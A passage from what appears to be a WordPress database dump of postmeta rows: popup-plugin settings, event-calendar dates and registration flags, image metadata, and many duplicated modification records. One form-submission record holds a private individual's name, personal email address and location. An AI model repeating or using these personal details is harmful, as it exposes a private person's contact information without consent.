Started'),(139177,264644,'enabled','0'),(139178,264644,'popup_settings','a:39:{s:8:\"triggers\";a:1:{i:0;a:2:{s:4:\"type\";s:9:\"auto_open\";s:8:\"settings\";a:2:{s:11:\"cookie_name\";s:10:\"pum-264644\";s:5:\"delay\";i:500;}}}s:7:\"cookies\";a:1:{i:0;a:2:{s:5:\"event\";s:14:\"on_popup_close\";s:8:\"settings\";a:5:{s:4:\"name\";s:10:\"pum-264644\";s:3:\"key\";s:0:\"\";s:7:\"session\";b:0;s:4:\"time\";s:7:\"1 month\";s:4:\"path\";s:1:\"1\";}}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:1:{s:6:\"target\";s:13:\"is_front_page\";}}}s:8:\"theme_id\";s:4:\"2085\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:6:\"center\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:13:\"default-theme\";}'),(139179,264644,'data_version','3'),(139180,264644,'popup_open_count','0'),(139181,264644,'popup_conversion_count','0'),(143716,265159,'mec_reg_fields','a:0:{}'),(143717,265159,'mec_op','a:0:{}'),(143718,265159,'mec_event_date_submit','20210422154949'),(143719,265159,'_edit_lock','1633644638:2'),(143720,265159,'_edit_last','2'),(143721,265159,'mec_read_more',''),(143722,265159,'mec_more_info',''),(143723,265159,'mec_more_info_title',''),(143724,265159,'mec_more_info_target','_self'),(143725,265159,'mec_cost',''),(143726,265159,'mec_currency','a:0:{}'),(143727,265159,'mec_additional_organizer_ids','a:0:{}'),(143728,265159,'mec_additional_location_ids','a:0:{}'),(143729,265159,'one_occurrence','0'),(143730,265159,'mec_timezone','global'),(143731,265159,'mec_countdown_method','global'),(143732,265159,'mec_public','1'),(143733,265159,'mec_bfixed_fields','a:0:{}'),(143734,265159,'mec_fields','a:0:{}'),(143735,265159,'mec_event_status','EventScheduled'),(143736,265159,'mec_moved_online_link',''),(143737,265159,'mec_cancelled_reason',''),(143738,265159,'mec_display_cancellation_reason_in_single_page',''),(143739,265159,'_thumbnail_id','265160'),(143740,265160,'_wp_attached_file','2021/06/hiking-path-1.jpg'),(143741,265160,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:633;s:6:\"height\";i:356;s:4:\"file\";s:25:\"2021/06/hiking-path-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hiking-path-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hiking-path-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:25:\"hiking-path-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:25:\"hiking-path-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:25:\"hiking-path-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:25:\"hiking-path-1-300x356.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:356;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"hiking-path-1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143715,265159,'mec_reg_fields_global_inheritance','1'),(143713,265159,'mec_ticket_variations_global_inheritance','1'),(143714,265159,'mec_ticket_variations','a:0:{}'),(143710,265159,'mec_tickets','a:0:{}'),(143711,265159,'mec_fees_global_inheritance','1'),(143712,265159,'mec_fees','a:0:{}'),(143683,265159,'mec_start_time_hour','7'),(143684,265159,'mec_start_time_minutes','0'),(143685,265159,'mec_start_time_ampm','PM'),(143686,265159,'mec_start_day_seconds','68400'),(143687,265159,'mec_end_date','2021-06-24'),(143688,265159,'mec_end_time_hour','8'),(143689,265159,'mec_end_time_minutes','0'),(143690,265159,'mec_end_time_ampm','PM'),(143691,265159,'mec_end_day_seconds','72000'),(143692,265159,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-06-24\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-06-24\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(143693,265159,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(143694,265159,'mec_certain_weekdays','a:0:{}'),(143695,265159,'mec_allday','0'),(143696,265159,'mec_hide_time','0'),(143697,265159,'mec_hide_end_time','0'),(143698,265159,'mec_comment',''),(143699,265159,'mec_repeat_status','0'),(143700,265159,'mec_repeat_type',''),(143701,265159,'mec_repeat_interval','1'),(143702,265159,'mec_repeat_end',''),(143703,265159,'mec_repeat_end_at_occurrences',''),(143704,265159,'mec_repeat_end_at_date',''),(143705,265159,'mec_advanced_days','a:0:{}'),(143706,265159,'mec_in_days',''),(143707,265159,'mec_not_in_days',''),(143708,265159,'mec_hourly_schedules','a:0:{}'),(143709,265159,'mec_booking','a:0:{}'),(143682,265159,'mec_start_date','2021-06-24'),(143681,265159,'mec_organizer_id','1'),(139198,264648,'protect_children',''),(139199,264648,'popup_title','Our Spring Sale Has Started'),(139200,264648,'enabled','0'),(139201,264648,'popup_settings','a:39:{s:8:\"triggers\";a:1:{i:0;a:2:{s:4:\"type\";s:9:\"auto_open\";s:8:\"settings\";a:2:{s:11:\"cookie_name\";s:10:\"pum-264648\";s:5:\"delay\";i:500;}}}s:7:\"cookies\";a:1:{i:0;a:2:{s:5:\"event\";s:14:\"on_popup_close\";s:8:\"settings\";a:5:{s:4:\"name\";s:10:\"pum-264648\";s:3:\"key\";s:0:\"\";s:7:\"session\";b:0;s:4:\"time\";s:7:\"1 month\";s:4:\"path\";s:1:\"1\";}}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:1:{s:6:\"target\";s:13:\"is_front_page\";}}}s:8:\"theme_id\";s:4:\"2085\";s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:6:\"center\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:13:\"default-theme\";}'),(139202,264648,'data_version','3'),(139203,264648,'popup_open_count','0'),(139204,264648,'popup_conversion_count','0'),(139379,264678,'protect_children',''),(139380,264678,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619468139;s:12:\"_EventOrigin\";i:1619468139;s:13:\"_thumbnail_id\";i:1619468139;s:24:\"boldgrid_hide_page_title\";i:1619468139;s:17:\"_EventShowMapLink\";i:1619468139;s:13:\"_EventShowMap\";i:1619468139;s:15:\"_EventStartDate\";i:1619468179;s:13:\"_EventEndDate\";i:1619468179;s:18:\"_EventStartDateUTC\";i:1619468179;s:16:\"_EventEndDateUTC\";i:1619468179;s:14:\"_EventDuration\";i:1619468139;s:20:\"_EventCurrencySymbol\";i:1619468139;s:22:\"_EventCurrencyPosition\";i:1619468139;s:10:\"_EventCost\";i:1619468139;s:9:\"_EventURL\";i:1619468139;s:14:\"_EventTimezone\";i:1619468139;s:18:\"_EventTimezoneAbbr\";i:1619468139;s:27:\"_EventNextPendingRecurrence\";i:1619468139;s:26:\"_RTECregistrationsDisabled\";i:1619468139;s:17:\"_RTECdeadlineType\";i:1619468139;s:19:\"_RTECwhoCanRegister\";i:1619468139;s:23:\"_RTEClimitRegistrations\";i:1619468139;s:21:\"_RTECmaxRegistrations\";i:1619468139;s:16:\"_EventRecurrence\";i:1619468139;s:18:\"_RTECnumRegistered\";i:1619468139;s:13:\"_EventVenueID\";i:1619468139;s:12:\"_dp_original\";i:1619468139;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619468139;s:16:\"tribe_events_cat\";i:1619489899;s:10:\"_edit_last\";i:1619468179;s:11:\"post_status\";i:1619468179;s:12:\"post_content\";i:1619468299;}'),(139209,264649,'_field_224','Kim'),(139210,264649,'_field_225','May'),(139211,264649,'_field_226','kimberlycleans13@gmail.com'),(139212,264649,'_field_227','CO'),(139213,264649,'_field_228','US'),(139214,264649,'_field_229','a:2:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(139215,264649,'_form_id','21'),(139216,264649,'_seq_num','123'),(139217,264650,'protect_children',''),(139218,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139219,264650,'_EventOrigin','events-calendar'),(139220,264650,'protect_children',''),(139221,264650,'protect_children',''),(139222,264650,'protect_children',''),(139223,264650,'protect_children',''),(139224,264650,'protect_children',''),(139225,264650,'protect_children',''),(139226,264650,'protect_children',''),(139227,264650,'protect_children',''),(139228,264650,'protect_children',''),(139229,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139261,264650,'_EventCurrencyPosition','prefix'),(139230,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139260,264650,'_EventCurrencySymbol',''),(139231,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139259,264650,'_EventDuration','3600'),(139262,264650,'_EventCost',''),(139232,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139258,264650,'_EventEndDateUTC','2021-05-17 22:00:00'),(139233,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139257,264650,'_EventStartDateUTC','2021-05-17 21:00:00'),(139263,264650,'_EventURL',''),(139234,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139256,264650,'_EventEndDate','2021-05-17 16:00:00'),(139264,264650,'_EventTimezone','America/Denver'),(139235,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139255,264650,'_EventStartDate','2021-05-17 15:00:00'),(139265,264650,'_EventTimezoneAbbr','MDT'),(139236,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139254,264650,'_EventShowMap',''),(139266,264650,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(139237,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\";i:1619444490;s:13:\"_thumbnail_id\";i:1619445226;s:24:\"boldgrid_hide_page_title\";i:1619444490;s:17:\"_EventShowMapLink\";i:1619444490;s:13:\"_EventShowMap\";i:1619444490;s:15:\"_EventStartDate\";i:1619445226;s:13:\"_EventEndDate\";i:1619445226;s:18:\"_EventStartDateUTC\";i:1619445226;s:16:\"_EventEndDateUTC\";i:1619445226;s:14:\"_EventDuration\";i:1619444490;s:20:\"_EventCurrencySymbol\";i:1619444490;s:22:\"_EventCurrencyPosition\";i:1619444490;s:10:\"_EventCost\";i:1619444490;s:9:\"_EventURL\";i:1619444490;s:14:\"_EventTimezone\";i:1619444490;s:18:\"_EventTimezoneAbbr\";i:1619445226;s:27:\"_EventNextPendingRecurrence\";i:1619444490;s:26:\"_RTECregistrationsDisabled\";i:1619444490;s:17:\"_RTECdeadlineType\";i:1619444490;s:19:\"_RTECwhoCanRegister\";i:1619444490;s:23:\"_RTEClimitRegistrations\";i:1619444490;s:21:\"_RTECmaxRegistrations\";i:1619444490;s:16:\"_EventRecurrence\";i:1619444490;s:18:\"_RTECnumRegistered\";i:1619444490;s:13:\"_EventVenueID\";i:1619444490;s:12:\"_dp_original\";i:1619444490;s:10:\"_edit_last\";i:1619444601;s:10:\"post_title\";i:1619444601;s:12:\"post_content\";i:1619445701;s:40:\"_oembed_c0ed44d4b4f8f387a25cfa556dceb09e\";i:1619444737;s:16:\"tribe_events_cat\";i:1619467301;s:11:\"post_status\";i:1619445226;}'),(139253,264650,'_EventShowMapLink',''),(139267,264650,'_RTECregistrationsDisabled','1'),(139268,264650,'_RTECdeadlineType','start'),(139238,264650,'_tribe_modified_fields','a:33:{s:16:\"protect_children\";i:1619444490;s:12:\"_EventOrigin\"